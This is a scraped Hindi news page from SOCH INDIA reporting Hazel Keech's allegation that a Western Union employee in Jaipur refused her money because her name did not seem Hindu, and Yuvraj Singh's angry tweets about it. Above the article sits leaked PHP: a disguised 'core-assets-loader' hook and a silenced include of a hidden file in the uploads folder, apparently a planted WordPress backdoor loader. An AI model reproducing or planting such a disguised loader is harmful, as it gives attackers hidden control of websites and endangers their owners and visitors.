add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मंगतेर के साथ नस्लभेदी बर्ताव पर भड़क उठे युवराज, किए ताबड़तोड़ ट्वीट! – SOCH INDIA
Menu

खेल
मंगतेर के साथ नस्लभेदी बर्ताव पर भड़क उठे युवराज, किए ताबड़तोड़ ट्वीट!

nobanner

क्रिकेटर युवराज सिंह की मंगेतर हेजल कीच ने अपने साथ नस्लभेदी बर्ताव का आरोप लगाया है। हेजल का आरोप है कि मनी ट्रांसफर सेवा देने वाली कंपनी वेस्टर्न यूनियन के कर्मचारी ने उन्हें ये कहकर पैसे देने से मना कर दिया कि उनका नाम हिंदू जैसा नहीं लगता है।

हेजल ने अपने साथ हुए दुर्व्यवहार की पूरी जानकारी ट्विटर के जरिए साझा की। अपनी मंगेतर के साथ हुए नस्लभेदी बर्ताव से युवराज भी नाराज दिखे और आरोपी के खिलाफ कार्रवाई की मांग की है।

क्रिकेटर युवराज सिंह की मंगेतर हेजल कीच ने अपने साथ नस्लभेदी बर्ताव का आरोप लगाया है। हेजल ने अपने साथ हुए दुर्व्यवहार की पूरी जानकारी ट्विटर के जरिए साझा की।

मंगेतर के साथ हुए इस नस्सभेदी बर्ताव से नाराज युवराज ने एक के बाद एक ये ट्वीट किए हैं–

 

हेजल ने ट्वीट किया है कि… अब तक मैं जितने भी लोगों से मिली हूं उनमें से जयपुर में वेस्टर्न यूनियन के कर्मचारी **** सबसे ज्यादा नस्लभेदी इंसान हैं। उन्होंने ये कहते हुए मुझे पैसे देने से इनकार कर दिया कि मेरा नाम हिंदू नहीं है।

 

 

उन्होंने आगे कई ट्वीट किए हैं जैसे कि इनके (वेस्टर्न यूनियन के कर्मचारी) बर्ताव से मैं बेहद दुखी हूं। ये घटना मेरी हिंदू मां और मुसलमान दोस्त के सामने हुई।

 

 

मेरा नाम हेजल कीच है और मैं जन्म से हिंदू हूं, लेकिन वेस्टर्न यूनियन को मुझे पैसे देने में इससे क्या फर्क पड़ता है ?